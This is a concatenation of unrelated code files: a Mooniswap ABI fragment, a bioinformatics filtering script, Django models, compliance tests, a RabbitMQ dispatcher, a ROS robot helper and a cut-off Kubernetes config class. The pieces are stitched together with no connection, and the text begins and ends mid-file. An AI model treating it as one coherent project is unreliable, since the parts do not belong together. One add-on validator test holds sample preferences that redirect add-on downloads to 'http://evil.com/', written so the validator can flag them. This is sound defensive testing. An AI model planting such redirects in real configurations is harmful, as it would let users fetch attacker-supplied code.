"address", "name": "target", "type": "address"}, ], "name": "depositFor", "outputs": [ {"internalType": "uint256", "name": "fairSupply", "type": "uint256"}, { "internalType": "uint256[2]", "name": "receivedAmounts", "type": "uint256[2]", }, ], "stateMutability": "payable", "type": "function", }, { "inputs": [], "name": "discardDecayPeriodVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [], "name": "discardFeeVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [], "name": "discardSlippageFeeVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [], "name": "fee", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "uint256", "name": "vote", "type": "uint256"}], "name": "feeVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "address", "name": "user", "type": "address"}], "name": "feeVotes", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "token", "type": "address"} ], "name": "getBalanceForAddition", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "token", "type": "address"} ], "name": "getBalanceForRemoval", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "src", "type": "address"}, {"internalType": "contract IERC20", "name": "dst", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, ], "name": "getReturn", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "getTokens", "outputs": [ {"internalType": "contract IERC20[]", "name": "tokens", "type": "address[]"} ], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "address", "name": "spender", "type": "address"}, {"internalType": "uint256", "name": "addedValue", "type": "uint256"}, ], "name": "increaseAllowance", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [], "name": "mooniswapFactoryGovernance", "outputs": [ { "internalType": "contract IMooniswapFactoryGovernance", "name": "", "type": "address", } ], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "name", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "owner", "outputs": [{"internalType": "address", "name": "", "type": "address"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "renounceOwnership", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "token", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, ], "name": "rescueFunds", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [ { "internalType": "contract IMooniswapFactoryGovernance", "name": "newMooniswapFactoryGovernance", "type": "address", } ], "name": "setMooniswapFactoryGovernance", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [], "name": "slippageFee", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "uint256", "name": "vote", "type": "uint256"}], "name": "slippageFeeVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "address", "name": "user", "type": "address"}], "name": "slippageFeeVotes", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "src", "type": "address"}, {"internalType": "contract IERC20", "name": "dst", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, {"internalType": "uint256", "name": "minReturn", "type": "uint256"}, {"internalType": "address", "name": "referral", "type": "address"}, ], "name": "swap", "outputs": [{"internalType": "uint256", "name": "result", "type": "uint256"}], "stateMutability": "payable", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "src", "type": "address"}, {"internalType": "contract IERC20", "name": "dst", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, {"internalType": "uint256", "name": "minReturn", "type": "uint256"}, {"internalType": "address", "name": "referral", "type": "address"}, {"internalType": "address payable", "name": "receiver", "type": "address"}, ], "name": "swapFor", "outputs": [{"internalType": "uint256", "name": "result", "type": "uint256"}], "stateMutability": "payable", "type": "function", }, { "inputs": [], "name": "symbol", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "token0", "outputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "token1", "outputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "uint256", "name": "i", "type": "uint256"}], "name": "tokens", "outputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "totalSupply", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "address", "name": "recipient", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, ], "name": "transfer", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [ {"internalType": "address", "name": "sender", "type": "address"}, {"internalType": "address", "name": "recipient", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, ], "name": "transferFrom", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "address", "name": "newOwner", "type": "address"}], "name": "transferOwnership", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "name": "virtualBalancesForAddition", "outputs": [ {"internalType": "uint216", "name": "balance", "type": "uint216"}, {"internalType": "uint40", "name": "time", "type": "uint40"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "name": "virtualBalancesForRemoval", "outputs": [ {"internalType": "uint216", "name": "balance", "type": "uint216"}, {"internalType": "uint40", "name": "time", "type": "uint40"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "virtualDecayPeriod", "outputs": [ {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint48", "name": "", "type": "uint48"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "virtualFee", "outputs": [ {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint48", "name": "", "type": "uint48"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "virtualSlippageFee", "outputs": [ {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint48", "name": "", "type": "uint48"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "name": "volumes", "outputs": [ {"internalType": "uint128", "name": "confirmed", "type": "uint128"}, {"internalType": "uint128", "name": "result", "type": "uint128"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "uint256", "name": "amount", "type": "uint256"}, {"internalType": "uint256[]", "name": "minReturns", "type": "uint256[]"}, ], "name": "withdraw", "outputs": [ { "internalType": "uint256[2]", "name": "withdrawnAmounts", "type": "uint256[2]", } ], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [ {"internalType": "uint256", "name": "amount", "type": "uint256"}, {"internalType": "uint256[]", "name": "minReturns", "type": "uint256[]"}, {"internalType": "address payable", "name": "target", "type": "address"}, ], "name": "withdrawFor", "outputs": [ { "internalType": "uint256[2]", "name": "withdrawnAmounts", "type": "uint256[2]", } ], "stateMutability": "nonpayable", "type": "function", }, ] thodk/proteostasis_imprinting_across_evolution0 # -*- coding: utf-8 -*- import pandas import os from constant_variables import define_main_dir from constant_variables import ensembl_classes def collect_data(main_dir, species_abbr, hsp): try: f = main_dir+'ensembl_data/'+hsp+'_raw_files/'+species_abbr+'.tsv' df = pandas.read_csv(f, sep='\t', index_col=0) ensembl_ids = df.ensembl_gene_id.tolist() except (IOError, AttributeError): ensembl_ids = [] try: f = main_dir+'uniprot_data/'+hsp+'_raw_files/'+species_abbr+'.tsv' df = pandas.read_csv(f, sep='\t', index_col=0) uniprot_ids = df.id.tolist() except (IOError, AttributeError): uniprot_ids = [] return {'ensembl':ensembl_ids, 'uniprot':uniprot_ids} def worker(ensembl_class): main_dir = define_main_dir(ensembl_class) output_dir = main_dir+'filtered_HSPs_annotation/' files_dir = main_dir+'files/' # load the organism names and get their abbreviations df = pandas.read_csv(files_dir+'final_species_names.tsv', sep='\t', index_col=0) # 1. for each abbreviation search if there are available annotation for the HSPs # 2. use of 'collect_data' data function to search in the 'raw' folders annotation_results = [] data = {} for species_abbr in df.abbreviation.tolist(): hsp70_annotation = collect_data(main_dir, species_abbr, 'hsp70') hsp40_annotation = collect_data(main_dir, species_abbr, 'hsp40') data.update({species_abbr : {'hsp70':hsp70_annotation, 'hsp40':hsp40_annotation}}) # True if count of annotated hsp70 > 0 s70 = False if sum([len(i) for i in hsp70_annotation.values()]) == 0 else True # True if count of annotated hsp40 > 0 s40 = False if sum([len(i) for i in hsp40_annotation.values()]) == 0 else True annotation_results.append([species_abbr, s70, s40]) columns = ['abbreviation', 'hsp70_bool', 'hsp40_bool'] df = pandas.DataFrame(annotation_results, columns=columns) if not os.path.exists(output_dir): os.makedirs(output_dir) pos_bool1 = df.hsp70_bool == True pos_bool2 = df.hsp40_bool == True # 1. combine the two booleans to check if True & True and filter the organisms # 2. save the data frame for the following steps filtered_df = df.loc[((pos_bool1) & (pos_bool2)), :] filtered_df.to_csv(main_dir+'01_species_with_HSPs_annotation.tsv', sep='\t') # save the HSPs annotation for each organism in the 'filtered_hsp_annotation' # folder. Each data frame should contain protein id, hsp family name, database for species_abbr in filtered_df.abbreviation.tolist(): tmp_annotation = data[species_abbr] tmp_list = [] for hsp, tmp_dict in tmp_annotation.items(): # key: ensembl or uniprot # hsp: hsp40 or hsp70 # ids: protein ids for key, ids in tmp_dict.items(): tmp_list = tmp_list + [[i,hsp,key] for i in ids] tmp_df = pandas.DataFrame(tmp_list, columns=['gene_symbol', 'hsp', 'resource']) tmp_df.to_csv(output_dir+species_abbr+'.tsv', sep='\t') ''' DESCRIPTION: That script reads the HSP annotations from UniProt and Ensembl databases, as they have been retrieved with scripts 10A and 10B. The annotated entries are gather together to examine which species have adequate annotation and which should be filtrered out. Two outputs: 1. 01_organisms_with_HSPs_annotation.tsv : contains only the species with annotation. They passed the first filtering. In order to be included in the final set of species, for the analysis, they should also pass the filtering for rRNA data and genomic annotation 2. 'filtered_HSPs_annotation/': contains the annotation file for each species: example: gene_symbol hsp resource Q03751 hsp40 uniprot Q9VPQ2 hsp40 uniprot P82910 hsp70 uniprot Q9VG58 hsp70 uniprot It will be used to retrieve the fasta files in the next steps ''' if __name__ == "__main__": # execute the worker for each ensembl class [worker(c) for c in ensembl_classes] from datetime import datetime from random import randint from statistics import mode from tkinter import CASCADE from django.db import models def random_string(): return str(randint(1000, 9999)) class adres(models.Model): miasto = models.CharField(max_length=50) kod_pocztowy = models.CharField(max_length=6) ulica = models.CharField(max_length=250) nr_domu = models.CharField(max_length=5) nr_mieszkania = models.CharField(max_length=4) def __str__(self): return f'{self.miasto}, {self.ulica} {self.nr_domu}' class Meta: verbose_name="Adres" verbose_name_plural="Adresy" ordering= ("miasto",) class osoba(models.Model): imie = models.CharField(max_length=50) nazwisko = models.CharField(max_length=50) pesel= models.CharField(max_length=11) is_staff=models.BooleanField(default=False) specjalizacja=models.CharField(max_length=100) adres=models.ForeignKey(adres, on_delete=models.CASCADE) def __str__(self): return f'{self.nazwisko}, {self.imie}' class Meta: verbose_name="Osoba" verbose_name_plural="Osoby" ordering= ("nazwisko",) class recepta(models.Model): kod_recepty=random_string() pacjent=models.ForeignKey(osoba, related_name='pacjent', on_delete=models.CASCADE) wystawca=models.ForeignKey(osoba, on_delete=models.CASCADE) data_wystawienia= models.DateTimeField(auto_now_add=True) def __str__(self): return f'{self.kod_recepty}' class Meta: verbose_name="Recepta" verbose_name_plural="Recepty" ordering= ("-data_wystawienia",) # payment_fraction = models.IntegerField(validators=[MinValueValidator(0), MaxValueValidator(100)]) class przepisane_leki(models.Model): recepta=models.ForeignKey(recepta, on_delete=models.CASCADE) nazwa_leku=models.CharField(max_length=250) dawkowanie=models.CharField(max_length=2000) odplatnosc=models.IntegerField() def __str__(self): return f'{self.nazwa_leku.upper()}' class Meta: verbose_name="Lek" verbose_name_plural="Leki" ordering= ("nazwa_leku",) from .core import * __author_name__ = "" __author_email__ = "" __author__ = "%s <%s>" % (__author_name__, __author_email__) __license__ = "MIT" __version__ = '0.3.0' VERSION = tuple(map(int, __version__.split('.'))) 10-100 from .codes import Code from .helpers import is_channel_name from .logging import get_logger from .message import Message from .modules import BaseModule, BaseResponder, ConfigMixin, \ BaseMessageDispatcherMixin, StandardMessageDispatcherMixin, \ AdminMessageDispatcherMixin from .signals import message_in, admin_message_in, message_out, on_exception, \ module_load, module_unload, module_loaded, module_unloaded, config_reload, \ config_reloaded, config_changed sunbenxin/saltdoc/_ext/saltdocs.py def setup(app): """Additions and customizations to Sphinx that are useful for documenting the Salt project. """ app.add_crossref_type(directivename="conf_master", rolename="conf_master", indextemplate="pair: %s; conf/master") app.add_crossref_type(directivename="conf_minion", rolename="conf_minion", indextemplate="pair: %s; conf/minion") app.add_crossref_type(directivename="conf-log", rolename="conf-log", indextemplate="pair: %s; conf/logging") #!/usr/bin/env python3 from .hostparse import * __version__ = "0.0.6" # -*- coding: utf-8 -*- """Module unittests.test_functions.test_parameter.py""" from compliance_suite.functions.parameter import * from compliance_suite.elements.content_case import ContentCase from unittests.methods import * import compliance_suite.config.constants as c runner_p, node_p, case_params_p = get_runner_node_case_params_by_case( "Search Projects With All Filters") runner_p.retrieved_server_settings["projects"]["supp_filters"] = [ "version", "name"] runner_e, node_e, case_params_e = get_runner_node_case_params_by_case( "Expressions Ticket - All Filters") runner_e.retrieved_server_settings["expressions"]["supp_filters"] = [ "studyID", "version"] runner_e.retrieved_server_settings["expressions"]["exp_format"] = "loom" runner_c, node_c, case_params_c = get_runner_node_case_params_by_case( "Continuous Ticket - All Filters") runner_e.retrieved_server_settings["continuous"]["supp_filters"] = [ "studyID", "version"] runner_e.retrieved_server_settings["continuous"]["exp_format"] = "tsv" continuous_search = get_runner_node_case_params_by_case( "Multi Continuous Ticket - Continuous Slice by chr, start, end, 1" ) content_case_continuous_search = ContentCase( continuous_search[2], continuous_search[1], continuous_search[0]) def test_all_supported_filters(): filters = all_supported_filters(node_p, runner_p) assert filters["version"] == "1.0" assert filters["name"] == "RNAgetTestProject0" def test_first_supported_filter(): filters = first_supported_filter(node_p, runner_p) assert len(filters) == 1 assert filters["name"] == "RNAgetTestProject0" def test_second_supported_filter(): filters = second_supported_filter(node_p, runner_p) assert len(filters) == 1 assert filters["version"] == "1.0" def test_third_supported_filter(): filters = third_supported_filter(node_p, runner_p) assert len(filters) == 1 assert filters["version"] == "1.0" def test_incorrect_filter_values(): filters = incorrect_filter_values(node_p, runner_p) assert filters["name"] == c.NONEXISTENT_ID assert filters["version"] == c.NONEXISTENT_ID def test_add_format_from_retrieved_settings(): filters = add_format_from_retrieved_settings(node_e, runner_e) assert len(filters) == 1 assert filters["format"] == "loom" def test_all_supported_filters_and_format_from_retrieved_settings(): filters = all_supported_filters_and_format_from_retrieved_settings( node_e, runner_e) assert filters["format"] == "loom" assert filters["version"] == "1.0" assert filters["studyID"] == "f3ba0b59bed0fa2f1030e7cb508324d1" def test_first_supported_filter_and_format(): filters = first_supported_filter_and_format(node_e, runner_e) assert len(filters) == 2 assert filters["format"] == "loom" assert filters["studyID"] == "f3ba0b59bed0fa2f1030e7cb508324d1" def test_second_supported_filter_and_format(): filters = second_supported_filter_and_format(node_e, runner_e) assert len(filters) == 2 assert filters["format"] == "loom" assert filters["version"] == "1.0" def test_incorrect_filters_and_format(): filters = incorrect_filters_and_format(node_e, runner_e) assert filters["format"] == c.NONEXISTENT_ID assert filters["studyID"] == c.NONEXISTENT_ID def test_switch_format_param(): filters = switch_format_param(node_e, runner_e) assert filters["format"] == "tsv" filters = switch_format_param(node_c, runner_c) assert filters["format"] == "loom" def test_all_supported_filters_chr_start_end(): filters = all_supported_filters_format_chr_start_end( content_case_continuous_search) fk = filters.keys() assert "chr" in fk assert "start" in fk assert "end" in fk assert filters["chr"] == "chr1" assert filters["start"] == "30" assert filters["end"] == "50" marevol/kgglrkgglr/parquet.py # coding: utf-8 import pyarrow.parquet as pq import pyarrow as pa def to_parquet(data_df, filename): print(f'Saving {filename}') table = pa.Table.from_pandas(data_df) pq.write_table(table, filename) def read_parquet(filename): print(f'Loading {filename}') table = pq.read_table(filename) return table.to_pandas() tests/test_js_prefs.py from js_helper import _do_test_raw def test_pref_innocuous_branch(): """ Tests that innocuous preferences created outside of the "extensions." branch from defaults/preferences/*.js files throw warnings, and that ones created in proper branches don't. """ assert _do_test_raw(""" pref("foo.bar", true); """, path='defaults/preferences/prefs.js').failed() assert _do_test_raw(""" user_pref("foo.bar", true); """, path='defaults/preferences/prefs.js').failed() assert _do_test_raw(""" pref("extensions.foo-bar", true); """, path='defaults/preferences/prefs.js').failed() assert not _do_test_raw(""" pref("extensions.foo-bar.baz", true); """, path='defaults/preferences/prefs.js').failed() def test_unicode_pref(): """Tests that non-ASCII preferences do not cause errors.""" assert not _do_test_raw(""" pref("extensions.foo-bar.\u263a", true); """, path='defaults/preferences/prefs.js').failed() assert not _do_test_raw(""" pref("extensions.foo-bar.\\u263a", true); """, path='defaults/preferences/prefs.js').failed() def test_pref_dangerous_branch(): """ Test that preferences created in dangerous branches from defaults/preferences/*.js files throw warnings. """ assert _do_test_raw(""" pref("extensions.getAddons.get.url", "http://evil.com/"); """, path='defaults/preferences/prefs.js').failed() assert _do_test_raw(""" user_pref("extensions.getAddons.get.url", "http://evil.com/"); """, path='defaults/preferences/prefs.js').failed() 10-100 from ..varint import write_varint from ..writer import write_binary_str class SettingType(object): @classmethod def write(cls, value, buf): raise NotImplementedError class SettingUInt64(SettingType): @classmethod def write(cls, value, buf): write_varint(int(value), buf) class SettingBool(SettingType): @classmethod def write(cls, value, buf): write_varint(bool(value), buf) class SettingString(SettingType): @classmethod def write(cls, value, buf): write_binary_str(value, buf) class SettingChar(SettingType): @classmethod def write(cls, value, buf): write_binary_str(value[0], buf) class SettingFloat(SettingType): @classmethod def write(cls, value, buf): """ Float is written in string representation. """ write_binary_str(str(value), buf) class SettingMaxThreads(SettingUInt64): @classmethod def write(cls, value, buf): if value == 'auto': value = 0 super(SettingMaxThreads, cls).write(value, buf) chib0/asd-winter2019 import functools import pika from threading import Thread import urlpath from cortex import utils SCHEME = "rabbitmq" module_logger = utils.logging.get_module_logger(__file__) def get_dispatcher(url, topics, auto_start=True, **kwargs): """ creates a dispatcher and connects to the given url :param auto_start: bool: start the dispatcher right away (on False, this will not connect the dispatcher) :param url: where to connect :param topics: topics that could be published :param kwargs: anything to pass on to the dispatcher implementation (TODO) :return: a dispatcher if the url scheme matches, None otherwise """ url = urlpath.URL(url) if not url.scheme == SCHEME: return None topics = topics if not isinstance(topics, str) else (topics, ) dispatcher = RabbitQueueDispatcher(pika.ConnectionParameters(host=url.hostname, port=url.port), topics) if auto_start: dispatcher.start() return dispatcher class RabbitQueueDispatcher: Exchange = 'cortex' def __init__(self, endpoints, topics, reconnecting=True): self._logger = utils.logging.get_instance_logger(self) self._connection = None self._exchange = None self._channel = None self._endpoints = endpoints self._topics = topics self._ioloop = None self._reconnect = reconnecting self._queue = [] def dispatch(self, topic, data, again=False): self._logger.info(f"got {topic}, {data} to publish {'again' if again else ''}") if not self._send_with_existing_channel(topic, data): self._logger.debug("creating new channel to dispatch with") self._queue.insert(0 if again else len(self._queue), (topic, data)) self._connection.channel(on_open_callback=self._on_channel_opened) def publish(self, *args, **kwargs): """ this is a pure forward to `self.dispatch` :param args: :param kwargs: :return: """ return self.dispatch(*args, **kwargs) def _send_with_existing_channel(self, topic, data): if not self._channel: self._logger.debug("no channel, can't send with existing") return False with utils.logging.log_exception(self._logger, to_suppress=Exception, format=lambda e: f"had error sending {e}"): self._logger.debug(f"sending {topic}: {data}") self._channel.basic_publish(self._exchange, topic, data) return True return False def _on_channel_opened(self, channel): self._channel = channel self._flush_messages() def _flush_messages(self): """ flushes all the messages that were to be dispatched by the queue. :return: """ while self._queue: topic, data = self._queue.pop(0) try: self._channel.basic_publish(self._exchange, topic, data) except Exception: # there is an issue with this channel, we're trying to reconnect. self.dispatch(topic, data, again=True) break def _declare_topics(self, connection): """ Creates a channel, declares the topics that this dispatcher should be handling on the client. :param connection: The connection to declare topics for :return: """ self._logger.info("opening channel...") def has_channel(channel): self._logger.info("declaring topics & exchange...") channel.exchange_declare(exchange=self.Exchange, exchange_type='fanout') for i in self._topics: channel.queue_declare(i) self._exchange = self.Exchange self._channel = channel ch = connection.channel(on_open_callback=has_channel) def _connection_closed(self, something, reason): """ logs that the connection was closed :param something: :param reason: :return: """ self._logger.info(f"connection closed: {reason}") self._connection.ioloop.stop() if self._reconnect: self.start() def _create_and_start_conn(self): """ thread entry method. Creates and starts ioloop for a rabbitmq connection :return: Nothing """ self._connection = pika.SelectConnection(self._endpoints, on_open_callback=self._declare_topics, on_close_callback=self._connection_closed) self._connection.ioloop.start() def start(self): """ Creates a connection and starts its ioloop in a different thread :return: """ self._ioloop = Thread(target=self._create_and_start_conn, daemon=True) self._ioloop.start() def stop(self): """ closes the connection; blocks until it's closed """ self._connection.close() self._ioloop.join() @property def running(self): return self._ioloop.is_alive() # Generated by Django 2.2.6 on 2020-03-09 16:49 import datetime from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('yatranepal', '0027_auto_20200224_0041'), ] operations = [ migrations.AlterField( model_name='status', name='current_time', field=models.DateTimeField(default=datetime.datetime(2020, 3, 9, 22, 34, 40, 837198), verbose_name='Current Date and Time'), ), migrations.DeleteModel( name='Transportation', ), migrations.DeleteModel( name='TransportationType', ), ] 0 #!/usr/bin/env python # Software License Agreement (MIT License) # # Copyright (c) 2020, tri_star # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # Author: , import numpy as np import rospy from std_msgs.msg import Bool from geometry_msgs.msg import Point, Quaternion, Pose from sensor_msgs.msg import JointState from control_wrapper.srv import SetPose from control_wrapper.srv import GetPose from control_wrapper.srv import GetJoints from control_wrapper.srv import SetJoints from control_wrapper.srv import Reset from control_wrapper.srv import SetTrajectory from control_wrapper.srv import CheckPose from tri_star import transformation_util from tri_star import constants def pose_matrix_to_msg(matrix): translation, rotation = transformation_util.decompose_homogeneous_transformation_matrix(matrix) position_msg = Point(translation[0], translation[1], translation[2]) quaternion_msg = Quaternion(rotation[0], rotation[1], rotation[2], rotation[3]) return Pose(position_msg, quaternion_msg) def pose_msg_to_matrix(pose_msg): position = np.array([pose_msg.position.x, pose_msg.position.y, pose_msg.position.z]) quaternion = np.array([pose_msg.orientation.x, pose_msg.orientation.y, pose_msg.orientation.z, pose_msg.orientation.w]) return transformation_util.get_homogeneous_transformation_matrix_from_quaternion(quaternion, position) def robot_topic(topic): robot = constants.get_robot_platform() side = constants.get_robot_platform_side() return "/{}/control_wrapper/{}/{}".format(robot, side, topic) class Robot(object): def __init__(self): self.free_drive_pub = rospy.Publisher(robot_topic("enable_freedrive"), Bool, queue_size=10) self.connect_pub = rospy.Publisher(robot_topic("connect"), Bool, queue_size=10) self.gripper_pub = rospy.Publisher(robot_topic("gripper"), Bool, queue_size=10) def get_robot_pose(self): service_topic = robot_topic("get_pose") rospy.wait_for_service(service_topic) get_current_pose = rospy.ServiceProxy(service_topic, GetPose) current_pose = None try: current_pose = pose_msg_to_matrix(get_current_pose().pose) except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return current_pose def get_robot_angle(self): service_topic = robot_topic("get_joints") rospy.wait_for_service(service_topic) get_current_joints = rospy.ServiceProxy(service_topic, GetJoints) current_joints = None try: current_joints = get_current_joints().joints except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return current_joints def set_robot_angle(self, joint_names, joint_angles): # angles is in degree is_reached = False try: service_topic = robot_topic("set_joints") rospy.wait_for_service(service_topic) set_current_joints = rospy.ServiceProxy(service_topic, SetJoints) joints = JointState() joints.name = joint_names joints.position = [np.deg2rad(angle) for angle in joint_angles] is_reached = set_current_joints(joints).is_reached except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return is_reached def set_robot_pose(self, pose_matrix, ask_before_move=True): if ask_before_move: raw_input("press any key to execute the trajectory") service_topic = robot_topic("set_pose") rospy.wait_for_service(service_topic) set_current_pose = rospy.ServiceProxy(service_topic, SetPose) is_reached = False try: pose_msg = pose_matrix_to_msg(pose_matrix) response = set_current_pose(pose_msg) pose = response.response_pose is_reached = response.is_reached if is_reached: print "[robot_util][set_robot_pose] robot reach pose SUCCEEDED" else: print "[robot_util][set_robot_pose] robot reach pose FAILED" print "[robot_util][set_robot_pose] pose to set" print pose_matrix print "[robot_util][set_robot_pose] pose reached" print self.get_robot_pose() except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return is_reached def execute_trajectory(self, ee_trajectory, ask_before_move=True): if ask_before_move: raw_input("press any key to execute trajectory...") service_topic = robot_topic("follow_trajectory") rospy.wait_for_service(service_topic) follow_trajectory = rospy.ServiceProxy(service_topic, SetTrajectory) is_reached = False try: poses = [pose_matrix_to_msg(i) for i in ee_trajectory] response = follow_trajectory(poses) current_pose = response.final_pose is_reached = response.is_reached print "is_reached: ", is_reached print "result pose (follow_trajectory)" print current_pose except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return is_reached # move robot out of work boundary def set_perceive_goal_pose(self, ask_before_move=True): joint_names = [] joint_angles = [] # in degrees if constants.get_robot_platform() == constants.ROBOT_PLATFORM_BAXTER: joint_names = [] joint_angles = [] elif constants.get_robot_platform() == constants.ROBOT_PLATFORM_UR5E: print "MOVING TO PRE GOAL LOCATION" joint_names = ["shoulder_pan_joint", "shoulder_lift_joint", "elbow_joint", "wrist_1_joint", "wrist_2_joint", "wrist_3_joint"] joint_angles = [-175.0, -118.0, -55.0, 115., -93, -6.] elif constants.get_robot_platform() == constants.ROBOT_PLATFORM_KUKA: joint_names = [] joint_angles = [] self.set_robot_angle(joint_names, joint_angles) def reset_robot(self, ask_before_move=True): if constants.is_simulator(): if constants.get_robot_platform() == constants.ROBOT_PLATFORM_BAXTER: return True if ask_before_move: raw_input("press any key to reset the robot...") service_topic = robot_topic("reset") rospy.wait_for_service(service_topic) reset = rospy.ServiceProxy(service_topic, Reset) is_reached = False try: is_reached = reset().is_reached except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return is_reached def free_drive_robot(self, enable): self.free_drive_pub.publish(enable) def connect_robot(self, enable): rospy.sleep(0.5) self.connect_pub.publish(enable) rospy.sleep(0.5) def gripper_robot(self, enable, ask_before_move=True): if ask_before_move: if enable: raw_input("press any key to open the gripper") else: raw_input("press any key to close the gripper") self.gripper_pub.publish(enable) rospy.sleep(2.0) def check_pose(self, pose): service_topic = robot_topic("check_pose") rospy.wait_for_service(service_topic) check_pose = rospy.ServiceProxy(service_topic, CheckPose) could_reach = False joint_changes = np.inf try: response = check_pose(pose_matrix_to_msg(pose)) could_reach = response.could_reach joint_changes = response.joint_changes except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return could_reach, joint_changes1-10 from lazycls.envs import * from lazycls.types import * from lazycls import BaseModel, classproperty from lazycls.funcs import timed_cache from lazycls.serializers import Base from kubernetes.client import Configuration from lazycls.base import set_modulename from lazycls.utils import get_parent_path, to_path, Path from .logz import get_logger DefaultHeaders = { 'Accept': 'application/json', 'Content-Type': 'application/json' } DefaultCacheDir = get_parent_path(__file__).joinpath('.kctlcache') logger = get_logger() set_modulename('kctl') # This is the base KctlCfg class that you can access natively without requiring initialization. # To manage multiple contexts, use the class below. class KctlCfg: host = envToStr('KCTL_HOST', 'http://localhost') api_key = envToStr('KCTL_API_KEY') api_key_prefix = envToStr('KCTL_API_KEY_PREFIX', 'token:') api_token = envToStr('KCTL_API_TOKEN') username = envToStr('KCTL_API_USERNAME') password = Str('') auth_prefix = envToStr('KTCL_AUTH_PREFIX', 'authorization') @classmethod @timed_cache(60) def get_headers(cls, username: str = None, password: str = None, api_key: str = None, api_token: str = None, auth_prefix: str = None, api_key_prefix: str = None): """ Logic Sequence: - username and password if provided - fallback to token if provided - 